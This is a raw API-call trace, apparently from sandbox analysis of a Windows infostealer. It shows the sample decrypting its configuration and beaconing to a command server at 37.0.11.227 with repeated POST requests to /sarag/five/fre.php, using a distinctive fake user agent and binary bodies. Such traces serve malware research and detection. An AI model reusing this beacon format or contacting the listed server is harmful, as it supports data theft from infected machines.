ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0245.643] GetProcessHeap () returned 0x690000 [0245.643] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0245.643] GetProcessHeap () returned 0x690000 [0245.643] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0245.644] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0245.645] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0245.645] GetProcessHeap () returned 0x690000 [0245.645] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0245.646] GetProcessHeap () returned 0x690000 [0245.646] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0245.646] GetProcessHeap () returned 0x690000 [0245.646] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0245.646] GetProcessHeap () returned 0x690000 [0245.646] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0245.647] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0245.648] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0245.648] GetProcessHeap () returned 0x690000 [0245.648] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0245.648] GetProcessHeap () returned 0x690000 [0245.648] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0245.649] send (s=0x6a8, buf=0x6ad508*, len=242, flags=0) returned 242 [0245.649] send (s=0x6a8, buf=0x6aba40*, len=159, flags=0) returned 159 [0245.649] GetProcessHeap () returned 0x690000 [0245.649] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0245.650] recv (in: s=0x6a8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0245.732] GetProcessHeap () returned 0x690000 [0245.732] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0245.732] GetProcessHeap () returned 0x690000 [0245.733] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0245.733] GetProcessHeap () returned 0x690000 [0245.733] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0245.733] GetProcessHeap () returned 0x690000 [0245.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0245.734] closesocket (s=0x6a8) returned 0 [0245.734] GetProcessHeap () returned 0x690000 [0245.735] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0245.735] GetProcessHeap () returned 0x690000 [0245.736] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0245.736] GetProcessHeap () returned 0x690000 [0245.736] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0245.736] GetProcessHeap () returned 0x690000 [0245.737] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0245.737] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x444) returned 0x6a8 [0245.739] Sleep (dwMilliseconds=0xea60) [0245.745] GetProcessHeap () returned 0x690000 [0245.745] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0245.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.746] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0245.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.754] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0245.763] GetProcessHeap () returned 0x690000 [0245.763] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0245.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.766] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0245.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.767] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0245.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.768] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.768] GetProcessHeap () returned 0x690000 [0245.769] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0245.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.770] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0245.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.771] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0245.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.771] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0245.771] GetProcessHeap () returned 0x690000 [0245.772] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0245.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.778] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0245.779] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.779] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0245.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.780] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0245.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.781] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0245.781] GetProcessHeap () returned 0x690000 [0245.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0245.782] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0245.782] GetProcessHeap () returned 0x690000 [0245.783] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0245.783] GetProcessHeap () returned 0x690000 [0245.783] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0245.783] GetProcessHeap () returned 0x690000 [0245.783] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0245.783] GetProcessHeap () returned 0x690000 [0245.784] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0245.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.785] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0245.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.793] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0245.800] GetProcessHeap () returned 0x690000 [0245.800] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0245.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.801] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0245.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.803] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0245.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.804] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.804] GetProcessHeap () returned 0x690000 [0245.804] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0245.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.806] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0245.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.807] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0245.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.811] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0245.811] GetProcessHeap () returned 0x690000 [0245.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0245.811] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.812] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0245.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.813] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0245.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.814] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0245.815] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.815] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0245.815] GetProcessHeap () returned 0x690000 [0245.815] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0245.816] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0245.816] GetProcessHeap () returned 0x690000 [0245.816] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0245.816] socket (af=2, type=1, protocol=6) returned 0x6ac [0245.816] connect (s=0x6ac, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0245.839] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0245.839] GetProcessHeap () returned 0x690000 [0245.839] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0245.839] GetProcessHeap () returned 0x690000 [0245.839] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0245.842] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0245.843] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0245.843] GetProcessHeap () returned 0x690000 [0245.843] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0245.843] GetProcessHeap () returned 0x690000 [0245.844] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0245.844] GetProcessHeap () returned 0x690000 [0245.844] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0245.844] GetProcessHeap () returned 0x690000 [0245.844] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0245.845] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0245.846] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0245.846] GetProcessHeap () returned 0x690000 [0245.846] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0245.846] GetProcessHeap () returned 0x690000 [0245.846] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0245.846] send (s=0x6ac, buf=0x6ad508*, len=242, flags=0) returned 242 [0245.847] send (s=0x6ac, buf=0x6aba40*, len=159, flags=0) returned 159 [0245.847] GetProcessHeap () returned 0x690000 [0245.847] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0245.847] recv (in: s=0x6ac, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0245.925] GetProcessHeap () returned 0x690000 [0245.925] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0245.925] GetProcessHeap () returned 0x690000 [0245.925] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0245.926] GetProcessHeap () returned 0x690000 [0245.926] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0245.926] GetProcessHeap () returned 0x690000 [0245.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0245.927] closesocket (s=0x6ac) returned 0 [0245.927] GetProcessHeap () returned 0x690000 [0245.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0245.927] GetProcessHeap () returned 0x690000 [0245.928] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0245.928] GetProcessHeap () returned 0x690000 [0245.928] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0245.928] GetProcessHeap () returned 0x690000 [0245.928] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0245.928] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1404) returned 0x6ac [0245.930] Sleep (dwMilliseconds=0xea60) [0245.932] GetProcessHeap () returned 0x690000 [0245.932] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0245.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.934] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0245.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.976] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0245.985] GetProcessHeap () returned 0x690000 [0245.985] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0245.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.986] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0245.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.987] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0245.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0245.988] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.988] GetProcessHeap () returned 0x690000 [0245.988] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0246.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.004] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0246.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.006] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0246.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.007] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0246.007] GetProcessHeap () returned 0x690000 [0246.007] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0246.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.008] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0246.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.010] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0246.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.011] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0246.012] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.012] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0246.012] GetProcessHeap () returned 0x690000 [0246.012] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0246.012] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0246.012] GetProcessHeap () returned 0x690000 [0246.013] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0246.013] GetProcessHeap () returned 0x690000 [0246.013] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0246.013] GetProcessHeap () returned 0x690000 [0246.013] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0246.014] GetProcessHeap () returned 0x690000 [0246.014] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0246.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.014] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.019] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0246.025] GetProcessHeap () returned 0x690000 [0246.025] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0246.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.026] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0246.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.027] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.028] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.028] GetProcessHeap () returned 0x690000 [0246.028] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0246.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.030] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0246.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.031] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0246.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.031] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0246.031] GetProcessHeap () returned 0x690000 [0246.032] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0246.032] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.032] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0246.033] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.033] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0246.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.034] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0246.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.035] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0246.035] GetProcessHeap () returned 0x690000 [0246.035] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0246.035] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0246.035] GetProcessHeap () returned 0x690000 [0246.035] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0246.035] socket (af=2, type=1, protocol=6) returned 0x6b0 [0246.036] connect (s=0x6b0, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0246.072] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0246.084] GetProcessHeap () returned 0x690000 [0246.084] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0246.084] GetProcessHeap () returned 0x690000 [0246.084] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0246.085] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0246.085] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0246.085] GetProcessHeap () returned 0x690000 [0246.086] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0246.086] GetProcessHeap () returned 0x690000 [0246.086] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0246.086] GetProcessHeap () returned 0x690000 [0246.086] 